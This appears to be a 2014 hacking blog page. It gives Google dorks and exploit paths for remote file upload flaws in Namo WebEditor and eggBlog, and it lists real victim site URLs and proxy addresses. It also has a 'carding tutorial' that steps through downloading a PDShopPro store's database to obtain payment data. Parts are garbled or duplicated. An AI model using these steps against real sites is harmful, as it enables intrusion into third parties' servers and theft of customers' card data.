Thursday, July 3, 2014
Namo WebEditor v5.0 Remote File Uploader
Dork:
inurl:/module/upload_image/
Example :
http://www.akcse.org/bbs/lib/module/upload_image/upform.phphttp://www.cgoa.ca/_new/bbs/lib/module/upload_image/upform.phphttp://luxbellate.com/mart/bbs/lib/module/upload_image/upform.phphttp://run.ksilbo.co.kr/bbs/bbs/lib/module/upload_image/upform.php
Tuesday, July 1, 2014
Sock 5 Vip!! (1/7/2014)
100.40.39.221:25351
139.130.180.93:42280
142.196.192.133:49723
162.156.150.39:38125
162.243.105.128:6170
173.167.143.29:42014
174.54.165.206:32093
184.1.104.81:16524
186.19.150.247:12637
188.219.199.250:5927
193.33.65.167:6947
194.247.12.11:6714
139.130.180.93:42280
142.196.192.133:49723
162.156.150.39:38125
162.243.105.128:6170
173.167.143.29:42014
174.54.165.206:32093
184.1.104.81:16524
186.19.150.247:12637
188.219.199.250:5927
193.33.65.167:6947
194.247.12.11:6714
[ADD ONS] Hacker ToolKit For Google Chrome
1- Web Developer
Web Developer is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
Web Developer is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
Monday, June 30, 2014
Carding Tutorial - PDShopPro Shopping Cart
Dork:
Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is
5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb
allinurl:/shop/category.asp?catid=
Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is
www.example.com/shop/category.asp?catid=24- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see some thing like this.
5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb
Exploit eggBlog 414 Arbitrary File Upload

"powered by eggBlog.net"
Exploit :
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Subscribe to:
Posts (Atom)